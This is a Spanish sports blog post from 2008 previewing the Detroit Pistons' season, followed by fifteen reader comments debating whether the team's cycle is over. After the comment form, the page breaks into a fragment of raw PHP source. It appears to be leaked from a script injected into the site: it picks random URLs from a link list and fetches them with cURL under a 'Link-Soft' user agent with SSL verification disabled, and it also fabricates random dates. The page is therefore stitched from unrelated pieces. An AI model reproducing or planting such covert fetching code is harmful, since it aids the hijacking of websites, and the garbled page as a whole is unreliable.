Detroit Pistons: Cambios en lo profundo para seguir igual

21 de October de 2008 por telekoman

pistons5Billups, Hamilton, Prince, Sheed y McDyess. Podría parecer que las cosas no han cambiado mucho en Detroit desde la temporada pasada. Y, sin embargo, el terremoto generado por la pérdida de la Final de Conferencia ante los Celtics ha provocado un cambio profundo bajo la superficie aparentemente tranquila de los Pistons.

Las palabras de Joe Dumars al perder dicha eliminatoria demuestran lo dispuesto a hacer cambios que se encuentra. Tras declarar que no estaba en absoluto contento con cómo había finalizado la temporada y cómo se había perdido la disciplina, Dumars confirmó que Rodney Stuckey, el base de segundo año, era el único jugador no transpasable. Sin embargo el GM de los Pistons nunca ha sido una persona irreflexiva. No lo era en su etapa de jugador y no lo está siendo ahora.

Con la base de los años anteriores y el cambio de entrenador -Michael curry sustituye en el banquillo a Flip Saunders- Detroit afronta una temporada que se antoja de transición. Claro que eso mismo llevamos diciendo varios años y sin embargo los Pistons han alcanzado la Final de Conferencia en 7 años consecutivos, incluyendo además la consecución de un Anillo. En estas siete temporadas, Billups, Hamilton y Prince han pertenecido a la plantilla, siempre desempeñando un papel importante. Sin embargo, resulta evidente que el tiempo no pasa en balde y Billups, Hamilton y compañía son, de nuevo, un año más viejos.

Pero el panorama no parece especialmente oscuro para la franquicia de la ciudad de la Motown en esta etapa de transición. Lejos de avistarse una feroz travesía por el desierto, los deberes parecen hechos en varias de las posiciones y los repuestos de los hombres claves empiezan a dar sus frutos. Sin embargo, muchos de los equipos de la Conferencia Este se han reforzado bien y alguna de las nuevas parejas interiores (Bosh-O’Neal, Brand-Dalembert) y exteriores (Mo Williams-Lebron) van a hacer mucho daño, por lo que será difícil llegar de nuevo a la Final de Conferencia.Sesión de fotos de Rodney Stuckey

Las posiciones exteriores parecen cubiertas más que de sobra. El protagonismo de Stuckey este año será decisivo, absorbiendo parte de los minutos de Billups y quizás de Hamiton. Los 32 minutos de media de la temporada pasada del base titular son excesivos y es totalmente necesario que llegue a la post-season más fresco. De Stuckey se espera que siga creciendo bajo la tutela de Billups, aportando dirección y puntos. El ex-barcelonista Alex Acker y el ex-Maccabi Will Bynum se disputarán la plaza de tercer base, aunque Acker puede actuar también en la posición de 2.

Hamilton, en el momento más dulce de su carrera, intentará seguir haciendo historia en Detroit y posiblemente volverá a comandar el ataque, e incluso la defensa. Otro sophomore, Arron Afflalo, será el encargo de suplir a RIP, aunque por lo demostrado el año pasado, todavía está lejos de alcanzar un nivel verdaderamente competitivo. Es público sin embargo que Dumars confía en él.

Tayshaun Prince será nuevamente el 3 titular, acompañado por Amir Johnson y Walter Hermann. El argentino puede ser una pieza importante en la rotación a poco que Johnson flaquée. Será necesaria una mayor aportación en forma de puntos desde esta posición ahora que la anotación de Billups necesariamente disminuirá por la pérdida de minutos.

Sheed y Maxiell como PFsEl eterno Sheed seguirá siendo el PF del equipo pero con 34 años recién cumplidos, es poco probable que supere los 25 minutos durante la temporada. Afortunadamente su suplente, Jason Maxiell, parece un recambio de garantías que ya el año pasado rindió a un gran nivel en los minutos de los que dispuso. Con casi 8 puntos y más de 5 rebotes de media en 21 minutos por partido, el futuro parece benigno con el jugador de tercer año.

Y por fin llegó la posición de 5. El año pasado McDyess cumplió con sus 7 rebotes y pico por partido. Pero las exigencias son grandes y para suplir la edad de McDyess los Pistons contrataron a Kwame Brown. Tras 7 temporadas en la NBA, ésta parece la última oportunidad de Brown de demostrar que su número 1 del Draft no fue un fiasco. Muchos dudamos.

Quinteto inicial: Chauncey Billups, Richard Hamilton, Tayshaun Prince, Rasheed Wallace y Antonio McDyess

Sexto hombre: Stuckey (Mejor Sexto Hombre de la temporada a no ser que las lesiones le vuelvan titular)

Pronóstico: Semifinales de Conferencia

Comenta

15 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Nunca subestimes el corazón de un campeón.
    Yo no los daría por acabados. No le encuentro justificación a que, por haber sido circunstancialmente eliminados por un extraordinario equipo se quiera iniciar una reconstrucción.
    Hasta el rabo todo es toro en Detroit.

      Citar

  2. telekoman dice:
    #2

    Bajo mi punto de vista están realizando una renovación, no una recosntrucción, y creo que es algo que tiene muchísimo mérito. Como puedes ver les doy semifinales de conferencia, pero evidentemente podrían volver a llegar a la Final e incluso ganarla. Dependerá de que los jóvenes den realmente la talla.

      Citar

  3. Jabho dice:
    #3

    Siento discrepar. Para mi los Pistons en este formato son un equipo acabado en cuanto a aspirar el anillo se refiere. Pero como equipo grande que son seguiran dando guerra y compitiendo y si mantienen este bloque aun puede hacer 2ª de PO, pero poco más.

    Boston y Detroit son cláramete mejores y ojito a los Sixers o MAgic.

    En fin, que creo necesario mas cambios. Dumars cambia de entrenador pero poco más. Las incoporaciones son excasas y el equipo, al menos por dentro, necesita más….

    Lo siento por ellos, pero su ciclo se ha acabado. Eso si, han sido grandes.

      Citar

  4. Viva_Dirk dice:
    #4

    Van a seguir siendo muy rocosos y dificiles de ganar salvo lesiones, pero estoy con Mordaunt en que que ganen el anillo sería una gran sorpresa.

    Lo que también espero es algun movimiento por parte de Dumars, Hamilton hizo unos grandes play-offs y tiene ahora mismo un cartel en la liga, creo que puede ser la moneda de cambio ya que dudo que Billups salga, pero de salir este último, sería el paso definitivo hacia un nuevo ciclo.

      Citar

  5. MagicJohnson32 dice:
    #5

    Coincido con Jabho (que supongo que se refiere a los Cavs cuando dice Detroit, jeje) y Viva. Tienen buen material para ser agresivos en el mercado y sin embargo no han hecho nada. ¿Acker, Bynum y Kwame? Pufff, muy poca cosa. Curry es una incógnita, aunque no creo que veamos grandes diferencias dado que el cuarteto principal lleva 5 años jugando junto.

    Dumars es un tío muy cabal, pero está siendo excesivamente conservador y los Pistons van siendo cada año menos competitivos.

      Citar

  6. Txusma dice:
    #6

    Opino como Magic. Tal vez este hubiese sido el verano ideal para moverse y conseguir cositas interesantes a corto y medio plazo y sin embargo estan de nuevo todos los que son. El banquillo, quitando a Stukey y tal vez Maxiell es bien poca cosa, pq aunq la gente habla mucho de Amir e incluso suena q pueda empezar de titular esta temporada, la verdad es q durante la pretemporada no ha hecho nada y nada es nada. 0.

      Citar

  7. Jabho dice:
    #7

    Si quería decir Cavs donde dije Detroit.

    Dumars debe moverse y yo optaría por mover al dúo Sheed-Billups porque creo que Prince y RIP pueden ser parte de otro ciclo en Detroit.

      Citar

  8. TheDeerHunter dice:
    #8

    le traiciona el subconsciente a Jabho…

    Me gustaría ver ese cruce Cleveland-Detroit… por cierto. Con todo el mundo sano por ambos lados.

      Citar

  9. portu dice:
    #9

    Estoy en la línea de Jabho… Para mi Detroit es un equipo acabado, pero ojo, acabado en lo q se refiere a ganar el Campeonato, q es su única meta. Seguramente entren en playoffs y pasen un par de rondas, pero creo q el ciclo está llegando a su fin por varias razones, siendo la principal la edad de Billups, Sheed y McDyess, y el por ahora, poco impacto de sus sucesores. Esta muy bien confiar ciegamente en Stuckey, Afflalo y Maxiell, pero por ahora podrían considerarse dignos sucesores de tipos como Prince, pero no de las verdaderas estrellas de Detroit, los clutch, los jugadores de playoffs, los de calidad en ataque y no sólo en defensa, y a mi modo de ver, esos han sido Billups y McDyess.

      Citar

  10. portu dice:
    #10

    Quería decir al final Billups y Sheed.

      Citar

  11. Javi dice:
    #11

    No me gusta Detroit Pistons, Prefiero no opinar.

      Citar

  12. Javi dice:
    #12

    No me gustan Detroit Pistons. Prefiero no opinar.

      Citar

  13. Gallis dice:
    #13

    Pues fijate que la cabeza me dice que Jahbo y compañia tienen razón, pero el estomago me dice que un Celtics-Pistons o un Cavs-Pistons hay que jugarlo…además, dudo que los Pistons no se muevan de aquí a febrero…

      Citar

  14. TheDeerHunter dice:
    #14

    Y tanto que hay que jugarlo…

    Creo que en este tipo de análisis se tiene equivocadamente a categorizar demasiado a los equipos. Tal equipo no puede nunca ganar a este otro…
    En muchas ocasiones, se hace desde un punto de vista demasiado circunstancial. Y fueron unas circunstancias muy concretas y distintas las que hicieron que, tanto el año pasado como hace dos, los pistons cayeran en la final de conferencia.

    Estaremos siempre de acuerdo con que este equipo parte a priori con una cierta desventaja y en que cada año lo viene teniendo más complicado, pero no se debe de dar por acabado un proyecto por el mero pecado de haber perdido toda una final de conferencia.
    Para que nos hagamos una idea del caché que todavía tienen “estos acabados” casi todos los analistas especializados los dan como 2os del oeste, o lo que es lo mismo, lo consideran un equipo superior a Cavs con una amplia mayoría.
    Reflexionar profundamente en “vuestro estómago”, como dice Gallis, a ver si de verdad consideraríais tantísima sorpresa que Detroit fuera capaz de vencer a Cleveland o a Boston… lo digo, porque al otro favorito en discordia, Orlando, ya se lo comió con patatas hace no demasiado.

      Citar

  15. portu dice:
    #15

    En una serie no dudo q detroit pueda hacer pupita a cualquier candidato al anillo, pero es q con estos análisis a tan largo plazo tb te das cuenta de toooodo el camino q les falta por recorrer hasta playoffs a todos los equipos. Un equipo con Billups en más de 35 tacos, Sheed igual, Hamilton, Prince y McDyess de titulares, más la aportación de 2 o 3 jóvens… pues sinceramente, nos los veo pasando de 1ª o 2ª ronda, veo superiores a Cavs y creo q una mala temporada regular les podria poner en un mal cruce en 1ª ronda y esta vez podría ser su fin esa 1ª ante algún rival con menos nombre como Toronto, Cavs, Orlando, Chicago o quien se encontraran en esa supuesta ronda. Quizás es un poco arriesgado decirlo, pero yo no les veo pasando de 2ª ronda. Si la pasan… pues ahí probablemente serían un rival más duro para Boston o Lakers o quien fuera q un rival más inexperto, posiblemente sí.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>